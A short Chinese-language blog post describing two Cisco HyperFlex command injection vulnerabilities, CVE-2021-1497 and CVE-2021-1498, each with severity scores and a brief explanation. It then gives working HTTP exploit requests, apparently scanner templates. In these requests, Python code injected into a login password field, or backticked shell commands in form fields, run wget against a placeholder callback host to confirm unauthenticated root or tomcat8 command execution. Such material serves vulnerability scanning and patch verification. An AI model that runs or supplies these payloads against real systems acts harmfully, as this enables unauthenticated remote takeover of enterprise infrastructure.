CVE-2021-1497:Cisco HyperFlex HX安装程序虚拟机命令注入漏洞
CVE ID:CVE-2021-1497 安全影响等级(SIR):严重 CVSS基本得分:9.8
Cisco HyperFlex HX Installer虚拟机基于Web的管理界面中的漏洞可能允许未经身份验证的远程攻击者对受影响的设备执行命令注入攻击。
此漏洞是由于对用户提供的输入的验证不足而引起的。攻击者可以通过向基于Web的管理界面发送精心设计的请求来利用此漏洞。成功利用此漏洞可能允许攻击者以root 用户身份在受影响的设备上执行任意命令。
POST /auth/change HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded username=root&password={{url_encode('123/",/"$6$$/"));import os;os.system(/"wget http://{{interactsh-url}}/");print(crypt.crypt(/"')}}
POST /auth HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded username=root&password={{url_encode('123/",/"$6$$/"));import os;os.system(/"wget http://{{interactsh-url}}/");print(crypt.crypt(/"')}}
CVE-2021-1498:Cisco HyperFlex HX数据平台命令注入漏洞
CVE ID:CVE-2021-1498 安全影响等级(SIR):高 CVSS基本分数:7.3
Cisco HyperFlex HX数据平台基于Web的管理界面中的漏洞可能允许未经身份验证的远程攻击者对受影响的设备执行命令注入攻击。
此漏洞是由于对用户提供的输入的验证不足而引起的。攻击者可以通过向基于Web的管理界面发送精心设计的请求来利用此漏洞。成功利用该漏洞可能使攻击者以tomcat8 用户的身份在受影响的设备上执行任意命令。
POST /storfs-asup HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded action=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`
原创文章,作者:ItWorker,如若转载,请注明出处:https://blog.ytso.com/212349.html